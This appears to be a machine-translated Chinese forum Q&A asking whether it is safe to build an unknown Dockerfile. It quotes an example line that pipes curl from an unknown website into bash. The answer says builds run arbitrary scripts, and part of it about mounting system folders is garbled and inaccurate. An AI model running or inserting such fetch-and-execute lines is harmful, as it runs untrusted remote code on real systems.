说您有一个未知的Dockerfile
,其中有一条或多条您不太了解的行。
示例:
FROM ubuntu
RUN curl --silent "https://some-unknown-website.io" | bash
问题:
构建此Dockerfile
是否安全?
如果是这样,运行生成的图像是否安全?
我相信即使建筑也不安全,但是今天互联网上的一个用户回复了我
由于
Dockerfile
是纯文本,并且您可以阅读,所以它实际上并不是未知的(因此很安全)。尽管我认为这是一个基本的问题,但是像“是否安全可靠地建立了未知的dockerfile”或“是否安全构建第三方dockerfile”这样的谷歌搜索并没有给出很好的结果。所以我在这里发布。
假设您有一个未知的Dockerfile,其中包含您不太了解的一行或多行内容。示例:从ubuntu运行curl –silent“ https://some-unknown-website.io” | bash问题:...
嗯,“安全”?不会。因为Dockerfile可以像系统上的所有文件夹一样挂载并运行这些文件夹上可用的每个脚本和程序,所以这是不安全的。在构建容器时,您正在运行可能会造成危害的任意脚本。